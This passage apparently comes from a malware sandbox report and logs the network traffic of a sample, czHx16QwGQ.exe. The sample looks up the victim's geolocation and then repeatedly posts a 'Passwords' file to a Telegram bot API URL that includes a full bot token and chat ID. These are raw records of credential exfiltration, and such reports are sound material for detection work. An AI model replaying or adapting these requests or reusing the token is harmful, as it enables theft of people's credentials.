                                                                                                              2025-01-10 22:38:52 UTC1390INData Raw: 62 6b d8 1d 6d 07 d3 60 c0 4b 47 07 bc d2 2e e0 ae 82 28 8d 8c f3 da 2b 73 db 8d d4 00 42 86 ea d2 04 7c 7c 26 fb 84 78 db ab 27 d2 78 09 77 86 a3 7a 77 be d1 07 5a bb b4 1a d3 ba f3 f9 e0 97 76 f2 10 71 fd 1a 2d f8 e1 c3 bb 26 50 5c 18 08 15 40 ce 16 6a 39 3e 14 14 2f 28 a0 2d 53 5a fb 8e 23 0b ff 61 4c 7e 02 95 0d 4a 8f ca 5f b6 79 50 84 7e 4b 09 95 0b 7e 0d 31 ba 72 30 ea 81 ac 72 39 84 a9 78 10 61 3f d9 fc ee ed c8 dd bc 1f 71 89 e8 f0 0c 4f 71 01 04 67 bf 87 7d fe 7d 35 7c c6 75 95 ed 9c ab a8 55 dd 88 de 00 75 1c b1 a1 6d 82 57 e3 3e e4 60 79 af b3 62 11 65 0b 19 fe d0 47 90 4d 5f 5f 69 d8 8a ac b3 3b b8 ba 29 ec ec 21 c1 49 86 fb 01 be ff 3e 5d 77 21 bb dc 60 a6 a3 ec 79 d0 8c a6 93 05 c4 00 48 75 d0 5b 5e 74 3f 88 87 29 ca 81 60 03 f4 6d c2 a7 40
                                                                                                              Data Ascii: bkm`KG.(+sB||&x'xwzwZvq-&P\@j9>/(-SZ#aL~J_yP~K~1r0r9xa?qOqg}}5|uUumW>`ybeGM__i;)!I>]w!`yHu[^t?)`m@
                                                                                                              2025-01-10 22:38:52 UTC1390INData Raw: 10 a4 55 9a 2e 58 3e 66 3f 03 31 44 12 3b 90 62 8e 5a 72 ef 14 f1 fd 09 e0 1b 42 65 0d 4c 9a 49 11 f5 e3 f1 54 45 fc 68 0b a3 11 ce 08 8f 4e 8e 9d 53 1d c7 09 b7 ba bd 80 9f c1 08 05 68 f0 4f 48 5b 48 e2 11 51 a0 50 3f c1 76 ce b8 f4 7e 42 d2 77 74 ad 56 b9 35 9f 4a 1c e5 4c 5b c2 7b 87 23 6b 59 51 a8 84 36 09 b6 49 24 26 ea 05 24 01 c5 77 3c 3b 4b f4 77 e0 c0 9d 1d 58 d1 cd 5c dd 44 87 c0 8a 58 5d 5e 02 40 13 55 e5 ea d3 aa 31 4d cd 74 3e c9 f7 db 8f 3c e1 da c0 1b 90 c3 cf 11 3b 2f 83 80 d2 e7 7a 83 2c e5 96 8a e7 81 a4 e3 39 06 45 65 61 eb f9 1c 94 99 5a b2 4b 29 ca af 75 73 61 08 77 38 d8 d1 26 e0 88 9e 61 81 41 07 08 6b ba 4e e2 b7 33 8c b5 b8 b1 95 69 c8 62 c6 ad 3d d6 88 91 9a b7 48 d7 a7 69 42 ab 8d 65 2b 2f d1 a3 92 6a c3 97 0a 27 26 08 09 e1 57
                                                                                                              Data Ascii: U.X>f?1D;bZrBeLITEhNShOH[HQP?v~BwtV5JL[{#kYQ6I$&$w<;KwX\DX]^@U1Mt><;/z,9EeaZK)usaw8&aAkN3ib=HiBe+/j'&W
                                                                                                              2025-01-10 22:38:52 UTC1390INData Raw: fc 55 2b b5 04 44 57 49 03 71 02 a5 61 65 67 9c 06 04 17 40 ba bc 12 27 07 4e 78 8c 10 b9 a2 03 cc ad 73 3f 29 e0 33 84 0f 30 e4 35 67 d4 7f 57 ae 67 8a b5 e3 4a 5c 15 2d 5e c0 e7 84 32 31 67 c6 cb b2 6b ac b3 06 2f 18 38 93 d2 b8 f1 dc a5 af 26 f0 60 8b 5a ae 30 61 45 96 bd ea ea 31 0d 88 09 0b 26 8c bf 9e 5e 50 a1 3d 43 ba b5 27 99 08 02 a8 74 98 83 ff 8c 58 31 d6 0d c1 cc d7 61 d1 2f f5 81 f9 9e 81 20 f5 59 99 89 30 7b 81 5c d5 ce 60 6d 81 1c bb bb 87 80 ca 3f 18 9e df 28 f0 ed 01 5b 7f 91 79 bd 67 4a fb c9 08 8d 2d cf 64 c1 06 a1 5d fa 4f 66 6c ed d4 83 1f 67 00 2e 82 da 5a 95 96 60 8f 67 3a e9 1d 5d d1 76 9b 42 75 08 ba 8a 1f b8 71 62 44 eb 5f bd 91 09 b8 14 0b b9 2e ae ae 60 b6 e9 41 32 28 94 a3 05 21 ae d1 ae 0b 70 20 76 c1 c9 e7 fa ee 00 4d 5d a2
                                                                                                              Data Ascii: U+DWIqaeg@'Nxs?)305gWgJ\-^21gk/8&`Z0aE1&^P=C'tX1a/ Y0{\`m?([ygJ-d]Oflg.Z`g:]vBuqbD_.`A2(!p vM]


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.849779104.21.112.14435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:38:54 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:38:54 UTC861INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:38:54 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1863523
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WQFgJeyZyBVodnJCI8BB7FQw9%2Bzg%2B3MJe78LjdGoF%2BQUrSh2%2Fh6z1YbLzq2w%2BVqx3Lvl0%2BghBYjtvsqtlUnY1W39GJLMChjAxlEVK9wY71D1PZq1vjLSWSKzAjHTCVSZOOsiWYGa"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 900028f87ee943b3-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1561&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1799137&cwnd=203&unsent_bytes=0&cid=5260dd896d8aa67a&ts=158&x=0"
                                                                                                              2025-01-10 22:38:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.849821149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:01 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd319daa71bf0d
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:39:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 64 61 61 37 31 62 66 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd319daa71bf0dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:01 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:01 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:01 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43670,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548741,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.849837149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:03 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd31b560e03860
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:39:03 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 35 36 30 65 30 33 38 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd31b560e03860Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:03 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:03 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:03 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43671,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548743,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.849848149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:05 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd31ca3ca070d5
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 22:39:05 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 61 33 63 61 30 37 30 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd31ca3ca070d5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:05 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:05 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:05 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43672,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548745,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.849858149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:06 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd31e06c304c60
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 22:39:06 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 30 36 63 33 30 34 63 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd31e06c304c60Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:07 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:07 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:07 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 34 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43673,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548747,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.849870149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:08 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd31f529a64ad4
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 22:39:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 35 32 39 61 36 34 61 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd31f529a64ad4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:08 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:08 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:08 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43674,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548748,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.849882149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:10 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd3209d84e4e33
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
